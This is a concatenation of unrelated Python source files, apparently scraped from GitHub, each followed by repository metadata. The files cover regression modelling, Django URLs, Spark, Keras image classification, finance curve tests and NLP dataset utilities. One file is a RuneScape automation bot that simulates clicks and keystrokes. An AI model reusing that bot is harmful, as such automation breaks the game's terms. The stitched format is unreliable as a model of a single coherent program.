# Data Distribution - Boxplot of continuous variables wrt to each category of categorical columns
sb.boxplot(x="y",y="age",data=bank,palette="hls")
sb.boxplot(x="y",y="balance",data=bank,palette="hls")
bank.columns
### Splitting the data into train and test data
train,test = train_test_split(bank,test_size = 0.3) # 30% size
train.columns
#model buliding
model1=sm.logit('y~age+balance+day+duration+campaign+marital_divorced+marital_married+marital_single+default_no+default_yes+housing_no+housing_yes+loan_no+loan_yes',data=train).fit()
model1.summary()#Housing variables are insignificant, so remove and build new model
model1.summary2()#AIC:17984.62
#new model without housing
model2=sm.logit('y~age+balance+day+duration+campaign+marital_divorced+marital_married+marital_single+default_no+default_yes+loan_no+loan_yes',data=train).fit()
model2.summary()
model2.summary2()#18701.11 :AIC
#model without default variables
model3=sm.logit('y~age+balance+day+duration+campaign+marital_divorced+marital_married+marital_single+loan_no+loan_yes',data=train).fit()
model3.summary()
model3.summary2()#AIC : 18705.60
#from above observation its seen that by removing insignificant variables AIC is incresing and same time more variables becomes insignifacant.
#so better is to perform operation on model1 which has low AIC and we can neglect pvalue as its binary in nature.
#prediction
train_pred = model1.predict(train.iloc[:,1:])
# Creating new column
# filling all the cells with zeroes
train["train_pred"] = np.zeros(31647)
# taking threshold value as 0.5 and above the prob value will be treated
# as correct value
train.loc[train_pred>0.5,"train_pred"] = 1
#classification report
classification = classification_report(train["train_pred"],train["y"])
'''
precision recall f1-score support
0.0 0.98 0.90 0.94 30517
1.0 0.17 0.56 0.26 1130
accuracy 0.89 31647
macro avg 0.58 0.73 0.60 31647
weighted avg 0.95 0.89 0.92 31647
'''
#confusion matrix
confusion_matrx = pd.crosstab(train.train_pred,train['y'])
confusion_matrx
accuracy_train = (27464+637)/(31647)
print(accuracy_train)#88.79
#ROC CURVE AND AUC
fpr,tpr,threshold = metrics.roc_curve(train["y"], train_pred)
#PLOT OF ROC
plt.plot(fpr,tpr);plt.xlabel("False positive rate");plt.ylabel("True positive rate")
################ AUC #########################
roc_auc = metrics.auc(fpr, tpr) #0.844 : Excellent model
######################It is a good model with AUC = 0.844 ###############################
#Based on ROC curv we can say that cut-off value = 0.50 is the best value for higher accuracy , by selecting different cut-off values accuracy is decreasing.
# Prediction on Test data set
test_pred = model1.predict(test)
# Creating new column for storing predicted class of Attorney
# filling all the cells with zeroes
test["test_pred"] = np.zeros(13564)
# taking threshold value as 0.5 and above the prob value will be treated
# as correct value
test.loc[test_pred>0.5,"test_pred"] = 1
# confusion matrix
confusion_matrix = pd.crosstab(test.test_pred,test['y'])
confusion_matrix
accuracy_test = (11741+324)/(13564)
accuracy_test#88.94
'''
####### Its a Just right model because Test and Train accuracy is same #################
Train accuracy=88.79
Test accuracy=88.94
''' | adarshm93/Regression | bank_data.py | bank_data.py | py | 5,068 | python | en | code | 1 | github-code | 13 |
41297149032 | from django.conf.urls import patterns, include, url
from django.conf.urls.static import static
from django.contrib import admin
from django.conf import settings
urlpatterns = patterns('',
# Examples:
# url(r'^$', 'djangotest.views.home', name='home'),
# url(r'^blog/', include('blog.urls')),
url(r'^admin/', include(admin.site.urls)),
url(r'^$', 'portal.views.index'),
url(r'^news/$','portal.views.news'),
url(r'^friends/$','portal.views.friends'),
url(r'^news/([\w\W]+)/$','portal.views.news_context'),
url(r'^studentshow/$','portal.views.students_show'),
url(r'^studentwork/(\d+)/$','portal.views.show_works'),
url(r'^register/$','portal.registerviews.register'),
url(r'^registerpost/$','portal.registerviews.register_post'),
url(r'^school/$', 'portal.views.school'),
url(r'^code/$','portal.registerviews.validate_code'),
)+static(settings.MEDIA_URL,document_root=settings.MEDIA_ROOT)
| MinWangCop/djangotest | djangotest/urls.py | urls.py | py | 947 | python | en | code | 0 | github-code | 13 |
12607970954 | def accommodate_new_pets(hotel_capacity, max_weight, *args):
accommodated_pets = 0
dictionary = {}
for i in args:
pet_type = i[0]
pet_weight = i[1]
if accommodated_pets < hotel_capacity:
if pet_weight <= max_weight:
accommodated_pets += 1
if pet_type not in dictionary:
dictionary[pet_type] = 0
dictionary[pet_type] += 1
elif accommodated_pets >= hotel_capacity:
result = "You did not manage to accommodate all pets!\n"
break
else:
result = f"All pets are accommodated! Available capacity: {hotel_capacity - accommodated_pets}.\n"
result += "Accommodated pets:\n"
ordered_dict = sorted(dictionary)
result += "\n".join([f"{i}: {dictionary[i]}" for i in ordered_dict])
return result
print(accommodate_new_pets(
10,
15.0,
("cat", 5.8),
("dog", 10.0),
))
print(accommodate_new_pets(
10,
10.0,
("cat", 5.8),
("dog", 10.5),
("parrot", 0.8),
("cat", 3.1),
))
print(accommodate_new_pets(
2,
15.0,
("dog", 10.0),
("cat", 5.8),
("cat", 2.7),
))
| DianTenev/Programming-advanced | Python Advanced Retake Exam - 09 August 2023/03. Pets Hotel.py | 03. Pets Hotel.py | py | 1,182 | python | en | code | 1 | github-code | 13 |
9628126147 | from pyspark import SparkConf, SparkContext
conf = SparkConf().setMaster("local[8]").setAppName("PopularHero") # Trying out 8 threads
sc = SparkContext(conf=conf)
# Marvel-Names.txt data format:
# first value: Marvel hero ID
# Second value: Marvel hero name
#
# Example:
# 2549 "HULK III/BRUCE BANNE"
def parseNames(line):
fields = line.split('\"')
# The encoding for fields[1] is weird - IntelliJ confirms it - explicitly encode this as utf8 here
return int(fields[0]), fields[1].encode("utf8")
names = sc.textFile("/home/mmanopoli/Udemy/TamingBigDataWithSparkAndPython/data/Marvel-Names.txt")
namesRdd = names.map(parseNames)
# Marvel-Graph.txt data format:
# First value = Marvel hero ID
# Remaining values = hero IDs the first hero ID has appeared with in comic books
#
# Note: The entries for a specific Hero ID can span multiple lines
#
# Example:
# 5983 1165 3836 4361 1282 716 4289 4646 6300 5084 2397 4454 1913 5861 5485
def countCoOccurences(line):
elements = line.split()
# Return the Hero ID and the number of fellow co-appearing hero IDs (length of line - 1)
return int(elements[0]), (len(elements) - 1)
lines = sc.textFile("/home/mmanopoli/Udemy/TamingBigDataWithSparkAndPython/data/Marvel-Graph.txt")
pairings = lines.map(countCoOccurences)
# Add up all co-appearing hero IDs for each hero ID
totalFriendsByCharacter = pairings.reduceByKey(lambda x, y: x + y)
# flipped = totalFriendsByCharacter.map(lambda xy : (xy[1], xy[0]))
# mostPopular = totalFriendsByCharacter.max()
mostPopular = totalFriendsByCharacter.max(lambda xy: xy[1])
# Use the lookup function to map / lookup the name
# Note: lookup(key) -> Python list
# mostPopularName = namesRdd.lookup(mostPopular[1])[0]
mostPopularName = namesRdd.lookup(key=mostPopular[0])[0]
# print(str(mostPopularName) + " is the most popular superhero, with " + \
# str(mostPopular[0]) + " co-appearances.")
print("{0} is the most popular superhero, with {1} co-appearances.".format(mostPopularName, mostPopular[1]))
| MManopoli/TamingBigDataWithSparkAndPython | 19-22_more_examples_of_Spark_programs/most-popular-superhero.py | most-popular-superhero.py | py | 2,015 | python | en | code | 0 | github-code | 13 |
14989099669 | from menu import products
def get_product_by_id(id: int) -> dict:
if type(id) == int:
product_found = {}
for item in products:
if item['_id'] == id:
product_found = item
return product_found
raise TypeError('product id must be an int')
def get_products_by_type(product_type: str) -> list:
if type(product_type) == str:
products_found = []
for item in products:
if item['type'] == product_type:
products_found.append(item)
return products_found
raise TypeError('product type must be a str')
def menu_report() -> str:
menu_count_type = 0
menu_name_type = ""
menu_count = len(products)
menu_sum = 0
menu_type = {}
for item in products:
menu_sum += item['price']
menu_average = round(menu_sum / menu_count, 2)
for item in products:
if not menu_type.get(item['type']):
menu_type[item['type']] = 1
else:
menu_type[item['type']] += 1
for key, value in menu_type.items():
if value > menu_count_type:
menu_name_type = key
menu_count_type = value
return f'Products Count: {menu_count} - Average Price: ${menu_average} - Most Common Type: {menu_name_type}'
def add_product(menu: list, **new_product: dict) -> dict:
new_id = len(menu) + 1
new_product['_id'] = new_id
menu.append(new_product)
return new_product
def add_product_extra(menu: list, *args: tuple, **new_product: dict) -> dict:
product_correct = new_product.copy()
for key in new_product.keys():
if key not in args:
product_correct.pop(key)
for required in args:
if required not in product_correct:
raise KeyError(f'field {required} is required')
print(product_correct)
new_id = len(menu) + 1
product_correct['_id'] = new_id
menu.append(product_correct)
return product_correct | jorgekimura2001/projeto-kiosque | management/product_handler.py | product_handler.py | py | 1,978 | python | en | code | 0 | github-code | 13 |
4321361401 | from financepy.utils.math import scale
from financepy.market.curves.discount_curve_nss import DiscountCurveNSS
from financepy.utils.date import Date
import numpy as np
tau1 = 2.0
tau2 = 0.5
times = np.linspace(0.0, 10.0, 5)
start_date = Date(1, 1, 2020)
dates = start_date.add_years(times)
def test_factor_loading_zero_rates():
curve1 = DiscountCurveNSS(start_date, 1., 0., 0., 0., tau1, tau2)
factor1loading = curve1.zero_rate(dates)
curve2 = DiscountCurveNSS(start_date, 0., 1., 0., 0., tau1, tau2)
factor2loading = curve2.zero_rate(dates)
curve3 = DiscountCurveNSS(start_date, 0., 0., 1., 0., tau1, tau2)
factor3loading = curve3.zero_rate(dates)
curve4 = DiscountCurveNSS(start_date, 0., 0., 0., 1., tau1, tau2)
factor4loading = curve4.zero_rate(dates)
assert [round(x, 4) for x in factor1loading] == [
1.0, 0.9852, 0.9852, 0.9856, 0.9855]
assert [round(x, 4) for x in factor2loading] == [
1.0001, 0.5628, 0.3617, 0.2568, 0.1958]
assert [round(x, 4) for x in factor3loading] == [.0001,
0.2800, 0.2809, 0.2335, 0.1891]
assert [round(x, 4) for x in factor4loading] == [-0.0,
0.1893, 0.0985, 0.0657, 0.0493]
def test_beta1():
beta2 = -0.02
beta3 = -0.02
beta4 = 0.08
beta1 = 0.03
curve1 = DiscountCurveNSS(start_date,
beta1, beta2, beta3, beta4, tau1, tau2)
zero_rates = curve1.zero_rate(dates)
assert [round(x, 4) for x in zero_rates] == [
0.01, 0.0278, 0.0246, 0.025, 0.0258]
beta1 = 0.04
curve2 = DiscountCurveNSS(start_date,
beta1, beta2, beta3, beta4, tau1, tau2)
zero_rates = curve2.zero_rate(dates)
assert [round(x, 4) for x in zero_rates] == [
0.02, 0.0377, 0.0344, 0.0349, 0.0357]
beta1 = 0.05
curve3 = DiscountCurveNSS(start_date,
beta1, beta2, beta3, beta4, tau1, tau2)
zero_rates = curve3.zero_rate(dates)
assert [round(x, 4) for x in zero_rates] == [
0.03, 0.0476, 0.0443, 0.0447, 0.0455]
beta1 = 0.06
curve4 = DiscountCurveNSS(start_date,
beta1, beta2, beta3, beta4, tau1, tau2)
zero_rates = curve4.zero_rate(dates)
assert [round(x, 4) for x in zero_rates] == [
0.04, 0.0574, 0.0541, 0.0546, 0.0554]
beta1 = 0.07
curve5 = DiscountCurveNSS(start_date,
beta1, beta2, beta3, beta4, tau1, tau2)
zero_rates = curve5.zero_rate(dates)
assert [round(x, 4) for x in zero_rates] == [
0.05, 0.0673, 0.064, 0.0644, 0.0652]
| domokane/FinancePy | tests/test_FinDiscountCurveNSS.py | test_FinDiscountCurveNSS.py | py | 2,689 | python | en | code | 1,701 | github-code | 13 |
39018875242 | from cmath import inf
from typing import List
from collections import defaultdict
from sympy import deg
class Solution:
def minTrioDegree(self, n: int, edges: List[List[int]]) -> int:
nodes = defaultdict(set)
for u, v in edges:
nodes[u].add(v)
nodes[v].add(u)
ans = inf
for u in nodes:
for n2 in nodes[u]:
for n3 in nodes[n2]:
if u in nodes[n3] and n2 in nodes[n3]:
ans = min(ans, len(nodes[u]) +
len(nodes[n2]) + len(nodes[n3])-6)
return ans if ans != inf else -1
def minToDegreeTwo(self, n: int, edges: List[List[int]]) -> int:
nodes = defaultdict(set)
degrees = defaultdict(int)
for u, v in edges:
if(u < v):
nodes[u].add(v)
else:
nodes[v].add(u)
degrees[u] += 1
degrees[v] += 1
ans = inf
for u in nodes:
for v in nodes[u]:
if(v not in nodes):
continue
for x in nodes[v]:
if x in nodes[u]:
ans = min(ans, degrees[u] +
degrees[v] + degrees[x] - 6)
return ans if ans != inf else -1
# return 0
n = 0
edges = [[1, 2], [1, 3], [3, 2], [4, 1], [5, 2], [3, 6]]
# print(Solution().minTrioDegree(n, edges))
print(Solution().minToDegreeTwo(n, edges))
| sarveshbhatnagar/CompetetiveProgramming | connected_trio.py | connected_trio.py | py | 1,515 | python | en | code | 0 | github-code | 13 |
42654542052 | # add function
my_set = {1, 2, 3, 4, 5}
print(my_set)
# add a value, successfull
my_set.add(6)
print(my_set)
# add a value, unsuccessful, but doesn't throw error.
my_set.add(6)
print(f"Doesn't add 6 again, {my_set} ")
# remove function
# successful if element is in the set.
my_set.remove(3)
print(f"Removing 3, {my_set}")
# # throws error if not present in set.
# my_set.remove(3)
# If we don't want it to throw an error if it doesn't exist, discard method can be used.
my_set.discard(3) # doesn't throw an error.
# successful removal.
my_set.discard(1)
#
copy_of_set = my_set.copy()
set_new = set([1, 2, 3, 4, 5])
set_new.clear()
# clears the set.
print(set_new)
# Mathematical set methods
math_students = {"Abhinav", "Manish", "Dhruv"}
science_students = {"Akash", "Abhinav", "Lekhraj", "Manish"}
# Getting union of a set.
print(math_students | science_students)
# Intersection of a set.
print(math_students & science_students)
| abhinav-m/python-playground | tutorials/basics/data-structures/tuples_and_sets/set_methods.py | set_methods.py | py | 950 | python | en | code | 0 | github-code | 13 |
12365892372 | from PIL import Image
import math
import colorsys
import random
from time import sleep
class WaterPlayer:
def __init__(self, width,height):
self.width = width
self.height = height
self.caustic = Image.open("../assets/caustics-texture.gif").resize((32,32))
self.vec1 =[random.uniform(-0.2,0.2),random.uniform(-0.1,0.1)]
self.pos1 = [0,0]
self.size1 = random.random() + 0.5
self.vec2 =[random.uniform(-0.5,0.5),random.uniform(-0.1,0.1)]
self.pos2 = [0,0]
self.size2 = random.random() + 0.5
def update(self, screen, time):
self.pos1[0] += self.vec1[0] * self.size1
self.pos1[1] += self.vec1[1] * self.size1
self.pos2[0] += self.vec2[0] * self.size2
self.pos2[1] += self.vec2[1] * self.size2
for x in range (self.width):
for y in range(self.height):
c1 =self.caustic.getpixel(((self.pos1[0]+x*self.size1)%self.caustic.size[0],(self.pos1[1]+y*self.size1) % self.caustic.size[1] ))
c2 =self.caustic.getpixel(((self.pos2[0]+x*self.size2)%self.caustic.size[0],(self.pos2[1]+y*self.size2) % self.caustic.size[1] ))
screen.write_pixel(x,y,0,0,32+min(255,min(c1,c2)))
def main():
from fake_screen import FakeScreen
waterplayer = WaterPlayer(10,15)
screen = FakeScreen(10,15)
for i in range(0,1000):
waterplayer.update(screen,i/10)
screen.show()
sleep(0.1)
if __name__ == "__main__":
main()
| andrewdyersmith/pingpongpi | daemon/water_player.py | water_player.py | py | 1,504 | python | en | code | 0 | github-code | 13 |
21850111552 | import util as ut
import xarray as xr
import absplots as apl
def main():
"""Main program called during execution."""
# initialize figure
fig, grid = apl.subplots_mm(
figsize=(135, 115), nrows=2, ncols=4, gridspec_kw=dict(
left=2.5, right=17.5, bottom=2.5, top=2.5, wspace=2.5, hspace=2.5),
subplot_kw=dict(projection=ut.pl.proj))
cax = fig.add_axes_mm([120, 2.5, 5, 110])
# loop on records
for i, rec in enumerate(ut.ciscyc_hr_records):
# open postprocessed output
ds = xr.load_dataset(
'../data/processed/ciscyc.5km.{}.ex.1ka.nc'.format(rec.lower()))
# plot
innerlevs = [l for l in range(200, 5000, 200) if l % 1000 != 0]
outerlevs = [l for l in range(200, 5000, 200) if l % 1000 == 0]
for j, age in enumerate([16, 14, 12, 10]):
ax = grid[i, j]
ax.set_rasterization_zorder(2.5)
snap = ds.sel(age=age)
snap.topg.plot.imshow(
ax=ax, add_colorbar=False, cmap=ut.topo_cmap,
norm=ut.topo_norm, zorder=-1)
snap.topg.plot.contour(
ax=ax, levels=[0], colors='0.25', linewidths=0.25, zorder=0)
snap.thk.notnull().plot.contour(
ax=ax, colors='0.25', levels=[0], linewidths=0.5)
(snap.topg+snap.thk).plot.contour(
ax=ax, colors='0.25', levels=innerlevs, linewidths=0.1)
(snap.topg+snap.thk).plot.contour(
ax=ax, colors='0.25', levels=outerlevs, linewidths=0.25)
((snap.uvelsurf**2+snap.vvelsurf**2)**0.5).plot.imshow(
ax=ax, alpha=0.75, cbar_ax=cax,
cmap=ut.vel_cmap, norm=ut.vel_norm, cbar_kwargs=dict(
label=r'Surface velocity ($m\,a^{-1}$)',))
# add map elements
ax.set_title('')
ut.pl.draw_natural_earth(ax)
ut.pl.add_corner_tag(ax, '{} ka'.format(age))
# add profile lines
for k, yp in enumerate([1.7e6, 1.4e6, 1.1e6, 0.8e6]):
ax.plot([-2.4e6, -1.25e6], [yp, yp], 'k|',
lw=0.25, ls='--', dashes=(2, 2))
if j == 3:
ax.text(-1.2e6, yp, chr(65+k), ha='left', va='bottom')
# add record label
ut.pl.add_corner_tag(ax, rec.upper(), va='bottom')
# add colorbar and save
ut.pl.savefig(fig)
if __name__ == '__main__':
main()
| juseg/cordillera | figures/ciscyc_hr_deglacshots.py | ciscyc_hr_deglacshots.py | py | 2,467 | python | en | code | 0 | github-code | 13 |
14379602352 | """Contains methods for loading data in various way."""
import tensorflow as tf
import download_and_convert as dc
import data_utils
# The default directory where the temporary files and the TFRecords are stored.
_DATA_DIR = 'data'
def load_data_numpy():
""" Get the data in ndarray format
Args:
None
Returns:
A tuple of train, validatioin and test dataset in ndarray format
"""
# Not implemented
return
def load_data_tfdataset():
""" Get the data in tfdataset format
Args:
None
Returns:
A tuple of train, validatioin and test dataset in tfrecord format
"""
# Get and unzip the compressed file to designated folder if necessary
# This will transform all the original data into tfrecord format
dc.run(_DATA_DIR)
# Load train dataset and decode to tensors
train_tfrecords = tf.data.TFRecordDataset(dc.get_tfrecord_filename(_DATA_DIR, 'train'))
parsed_train = train_tfrecords.map(data_utils.read_tfrecord)
# Load validation dataset and decode to tensors
dev_tfrecords = tf.data.TFRecordDataset(dc.get_tfrecord_filename(_DATA_DIR, 'dev'))
parsed_dev = dev_tfrecords.map(data_utils.read_tfrecord)
# Load test dataset and decode to tensors
test_tfrecords = tf.data.TFRecordDataset(dc.get_tfrecord_filename(_DATA_DIR, 'test'))
parsed_test = test_tfrecords.map(data_utils.read_tfrecord)
return parsed_train, parsed_dev, parsed_test | jenhokuo/LED-Digits-Recognition | dataset_led.py | dataset_led.py | py | 1,461 | python | en | code | 0 | github-code | 13 |
21332910639 | import matplotlib.pyplot as plt
import numpy as np
import os
import keras
from tensorflow.keras import layers
from PIL import Image
import tensorflow as tf
import tensorflow_addons as tfa
train_ds = tf.keras.utils.image_dataset_from_directory(
'sortedPics/forTraining',
label_mode='categorical',
validation_split=0.2,
image_size=(160,160),
subset="training",
seed=123,
batch_size=64)
val_ds = tf.keras.utils.image_dataset_from_directory(
'sortedPics/forTraining',
label_mode='categorical',
validation_split=0.2,
image_size=(160,160),
subset="validation",
seed=123,
batch_size=64)
class_names = train_ds.class_names
AUTOTUNE = tf.data.AUTOTUNE
train_ds = train_ds.prefetch(buffer_size=AUTOTUNE)
val_ds = val_ds.prefetch(buffer_size=AUTOTUNE)
size = (160, 160)
#MODEL 2-STANDARD, lr=0.001 epochs=50/10, opt=adam,
resnet_model7 = tf.keras.Sequential([tf.keras.layers.RandomFlip('vertical'),
tf.keras.layers.RandomRotation(0.2),])
pretrained_model= tf.keras.applications.ResNet50(include_top=False,
input_shape=(160,160,3),
pooling='avg',classes=10,
weights='imagenet')
for layer in pretrained_model.layers:
layer.trainable=False
resnet_model7.add(pretrained_model)
base_learning_rate=0.0001
resnet_model7.add(tf.keras.layers.Dense(10, activation='softmax'))
resnet_model7.compile(
optimizer=tf.keras.optimizers.Adam(learning_rate=base_learning_rate),
loss=tfa.losses.SigmoidFocalCrossEntropy(from_logits=False),
metrics=['accuracy'],
)
initial_epochs = 8
history=resnet_model7.fit(train_ds, epochs=initial_epochs, validation_data=val_ds)
resnet_model7.save("RNm7PreTune")
resnet_model7.save("RNm7PreTune.h5")
#create graph
acc = history.history['accuracy']
val_acc = history.history['val_accuracy']
loss = history.history['loss']
val_loss = history.history['val_loss']
epochs_range = range(initial_epochs)
plt.figure(figsize=(8, 8))
plt.subplot(1, 2, 1)
plt.plot(epochs_range, acc, label='Training Accuracy')
plt.plot(epochs_range, val_acc, label='Validation Accuracy')
plt.legend(loc='lower right')
plt.title('Training and Validation Accuracy')
plt.subplot(1, 2, 2)
plt.plot(epochs_range, loss, label='Training Loss')
plt.plot(epochs_range, val_loss, label='Validation Loss')
plt.legend(loc='upper right')
plt.savefig("RNm7PreFineTune.jpg")
#fine-tuning
pretrained_model.trainable = True
# Fine-tune from this layer onwards
fine_tune_at = 115
# Freeze all the layers before the `fine_tune_at` layer
for layer in pretrained_model.layers[:fine_tune_at]:
layer.trainable = False
#set up callback for early stopping
callback = tf.keras.callbacks.EarlyStopping(monitor='loss', patience=3, restore_best_weights=True)
resnet_model7.compile(loss=tfa.losses.SigmoidFocalCrossEntropy(from_logits=False),
optimizer = tf.keras.optimizers.Adam(learning_rate=base_learning_rate/10),
metrics=['accuracy'])
fine_tune_epochs = 10
total_epochs = initial_epochs + fine_tune_epochs
history_fine = resnet_model7.fit(train_ds,
epochs=total_epochs, callbacks=[callback],
initial_epoch=history.epoch[-1],
validation_data=val_ds)
resnet_model7.save("RNm7PostTune")
resnet_model7.save("RNm7PostTune.h5")
#create graph
acc += history_fine.history['accuracy']
val_acc += history_fine.history['val_accuracy']
loss += history_fine.history['loss']
val_loss += history_fine.history['val_loss']
plt.figure(figsize=(8, 8))
plt.subplot(2, 1, 1)
plt.plot(acc, label='Training Accuracy')
plt.plot(val_acc, label='Validation Accuracy')
plt.ylim([0.8, 1])
plt.plot([initial_epochs-1,initial_epochs-1],
plt.ylim(), label='Start Fine Tuning')
plt.legend(loc='lower right')
plt.title('Training and Validation Accuracy')
plt.subplot(2, 1, 2)
plt.plot(loss, label='Training Loss')
plt.plot(val_loss, label='Validation Loss')
plt.ylim([0, 1.0])
plt.plot([initial_epochs-1,initial_epochs-1],
plt.ylim(), label='Start Fine Tuning')
plt.legend(loc='upper right')
plt.title('Training and Validation Loss')
plt.xlabel('epoch')
plt.savefig("RNm7PostFineTune.jpg") | nmayerfeld/summerProject | Model7.py | Model7.py | py | 4,160 | python | en | code | 2 | github-code | 13 |
28389641522 | import sys, os, time
PACKAGE_PARENT = '../..'
SCRIPT_DIR = os.path.dirname(os.path.realpath(os.path.join(os.getcwd(), os.path.expanduser(__file__))))
sys.path.append(os.path.normpath(os.path.join(SCRIPT_DIR, PACKAGE_PARENT)))
from master_bot.master import Bot as runeBot
player = runeBot(os.path.normpath(os.path.join(SCRIPT_DIR, PACKAGE_PARENT)))
player.selectThing("bank",offset=[7,2])
time.sleep(2)
while True:
player.clickMouse("down",spaces=0.5)
time.sleep(0.5)
player.selectThing("blast/steel")
player.selectThing("furnace", offset=[-4.5,0])
time.sleep(10.4)
player.clickMouse("right",spaces=3)
time.sleep(0.4)
player.simulateKey("space")
time.sleep(155)
player.selectThing("bank",offset=[7,2])
time.sleep(11)
| SimSam115/orsr_bbb | tests/usingMaster_bot/cannonballMaker.py | cannonballMaker.py | py | 762 | python | en | code | 0 | github-code | 13 |
29831260945 | import numpy as np
import torch
from collections import defaultdict
import string
from sequence.data import traits
from enum import IntEnum
from typing import List, Dict, Optional, Union, Sequence
import functools
def lazyprop(fn):
attr_name = "_lazy_" + fn.__name__
@property
@functools.wraps(fn)
def _lazyprop(self):
if not hasattr(self, attr_name):
setattr(self, attr_name, fn(self))
return getattr(self, attr_name)
return _lazyprop
class Tokens(IntEnum):
EOS = 0
SOS = 1
UNKNOWN = 2
class Language:
"""
The vocabulary of a dataset. This will map the unique strings to indexes that map to the embeddings.
You can also provide custom embeddings object.
"""
def __init__(
self,
words: Optional[List[str]] = None,
lower: bool = True,
remove_punctuation: bool = True,
custom_embeddings: Optional[np.ndarray] = None,
):
"""
Parameters
----------
words
Unique words in the dataset
lower
Lower the string: str.lower()
remove_punctuation
!"#$%&'()*+,-./:;<=>?@[\]^_`{|}~ will be removed
custom_embeddings
Shape(num_embeddings, embedding_dim)
"""
self.lower = lower
self.remove_punctuation = remove_punctuation
if remove_punctuation:
self.translation_table = str.maketrans("", "", string.punctuation)
else:
self.remove_punctuation = False
# Warning. Don't change index 0, 1, and 2
# These are used in the models!
self.w2i: Dict[str, int] = {
"EOS": Tokens.EOS,
"SOS": Tokens.SOS,
"UNKNOWN": Tokens.UNKNOWN,
}
if words is not None:
self.register(words)
self.custom_embeddings = self.init_custom_emb(custom_embeddings)
@staticmethod
def init_custom_emb(
custom_embeddings: Optional[torch.Tensor],
) -> Optional[np.ndarray]:
if custom_embeddings is not None:
# we need to concat 3 embeddings for EOS, SOS and UNKNOWN
_, emb_dim = custom_embeddings.shape
pre = np.zeros((3, emb_dim))
# one hot encode. TODO: maybe something smarter?
# can fail if embedding size is two. It happened to you? You can't be serious!
pre[0, 0] = 1
pre[1, 1] = 1
pre[2, 2] = 1
return torch.tensor(
np.concatenate((pre, custom_embeddings), axis=0), dtype=torch.float32
)
return None
def clean(self, word: str) -> str:
"""
Transform str to lowercase and optionally remove punctuation
"""
if self.lower:
word = word.lower()
if self.remove_punctuation:
# Make a translation table when given 3 args.
# All punctuation will be mapped to None
word = word.translate(self.translation_table)
return word
def register(self, words: List[str]):
[self.register_single_word(w) for w in words]
def register_single_word(self, word: str):
"""
Register words as indexes
Parameters
----------
word
unique word
"""
c = self.clean(word)
if len(c) > 0:
self.w2i[c] = len(self.w2i)
@lazyprop
def i2w(self) -> Dict[int, Optional[str]]:
d: Dict[int, Optional[str]] = defaultdict(lambda: None)
d.update({v: k for k, v in self.w2i.items()})
return d
@property
def vocabulary_size(self) -> int:
return len(self.w2i)
@property
def words(self) -> List[str]:
return list(self.w2i.keys())
def translate_batch(self, padded: torch.Tensor) -> np.ndarray:
"""
Parameters
----------
padded : torch.Tensor
Tensor with word indexes. Shape: (seq_len, batch)
Returns
-------
out : np.Array[int]
Array with matching words. Shape: (seq_len, batch)
"""
# Only eval once
d = self.i2w
d[-1] = ""
if hasattr(padded, "cpu"):
padded = padded.cpu().data.numpy()
return np.vectorize(d.get)(padded)
def __getitem__(self, item: Union[int, str]) -> Union[int, str]:
if isinstance(item, int):
return self.i2w[item]
else:
return self.w2i[item]
def __contains__(self, item: Union[int, str]) -> bool:
if isinstance(item, str):
return self.clean(item) in self.w2i
else:
return item in self.i2w
class Dataset(
traits.Query, traits.TransitionMatrix, traits.Transform, traits.DatasetABC
):
"""
Dataset used in training. This has some lazy operations due to dask usage.
"""
def __init__(
self,
sentences: List[List[str]],
language: Optional[Language],
skip: Sequence[str] = (),
buffer_size: int = int(1e4),
max_len: int = None,
min_len: int = 1,
device: str = "cpu",
chunk_size: Union[int, str] = "auto",
allow_con_dup: bool = True,
):
"""
Parameters
----------
sentences : list[list[str]]
[["hello", "world!"], ["get", "down!"]]
language : sequence.data.utils.Language
Required. Should be the language fitted for training.
skip : list[str]
Words to skip.
buffer_size : int
Size of chunks prepared by lazy generator.
Only used during preparation of dataset.
max_len : int
Max sequence length.
min_len : int
Min sequence length.
device : str
'cuda' | 'cpu'
chunk_size : str/ int
Passed to dask array.
allow_con_dup : bool
Filter sequences from consecutive duplicates
"""
language = Language() if language is None else language
traits.DatasetABC.__init__(self, self, language=language, device=device)
traits.Query.__init__(self, self)
traits.TransitionMatrix.__init__(self, self)
traits.Transform.__init__(
self,
parent=self,
buffer_size=buffer_size,
min_len=min_len,
max_len=max_len,
chunk_size=chunk_size,
sentences=sentences,
skip=skip,
allow_con_dup=allow_con_dup,
)
def split(self, fracs, shuffle=True):
"""
Split dataset in [train, test, ..., val] Datasets.
Parameters
----------
fracs : Sequence
shuffle : bool
Returns
-------
datasets : tuple[Dataset]
A new Dataset object for every fraction in fracs
"""
idx = np.arange(len(self.data))
dsets = tuple(Dataset(None, language=self.language) for _ in fracs)
fracs = np.array([0] + fracs)
assert fracs.sum() == 1
if shuffle:
np.random.shuffle(idx)
slice_idx = np.cumsum(fracs * len(self.data)).astype(int)
slice_idx = [(i, j) for i, j in zip(slice_idx[:-1], slice_idx[1:])]
for (i, j), ds in zip(slice_idx, dsets):
ds.__dict__.update(self.__dict__)
ds.data = self.data[i:j]
ds.set_idx()
return dsets
class ArrayWrap(np.ndarray):
# We only wrap a numpy array such that it has a compute method
# See: https://docs.scipy.org/doc/numpy-1.13.0/user/basics.subclassing.html
def __new__(cls, input_array, attr=None):
obj = np.asarray(input_array).view(cls)
obj.compute = attr
return obj
def __array_finalize__(self, obj):
if obj is None:
return
self.compute = lambda: self
class DatasetEager(Dataset):
"""
The eager variation of Dataset. This class doesn't use Dask.
"""
def __init__(
self,
sentences: List[List[str]],
language: Optional[Language] = None,
skip: Sequence[str] = (),
buffer_size: int = int(1e4),
max_len: Optional[int] = None,
min_len: int = 1,
device: str = "cpu",
chunk_size: str = "auto",
):
super().__init__(
sentences=sentences,
language=language,
skip=skip,
buffer_size=buffer_size,
max_len=max_len,
min_len=min_len,
device=device,
chunk_size=chunk_size,
)
def transform_data(self):
if self.max_len is None:
self.max_len = max(map(len, self.paths))
size = len(self.paths)
array = []
for i, j in zip(
range(0, size, self.buffer_size),
range(self.buffer_size, size + self.buffer_size, self.buffer_size),
):
array.append(self._gen(i, j, size))
self.data = np.concatenate(array)
# Because of transformation conditions there can be empty sequences
# These need to be removed.
# The actual computed values are a bit shorter.
# Because the data rows % buffer_size has a remainder.
mask_short = self.data.sum(-1) == -(self.max_len + 1)
mask = np.ones(shape=(self.data.shape[0],), dtype=bool)
mask[: mask_short.shape[0]] = mask_short
self.data = ArrayWrap(self.data[~mask])
self.set_idx()
class DatasetInference(traits.Query, traits.Transform, traits.DatasetABC):
"""
Dataset used during inference.
"""
def __init__(
self,
sentences: List[List[str]],
language: Language,
buffer_size: int = int(1e4),
max_len: Optional[int] = None,
min_len: int = 1,
device: str = "cpu",
chunk_size: str = "auto",
):
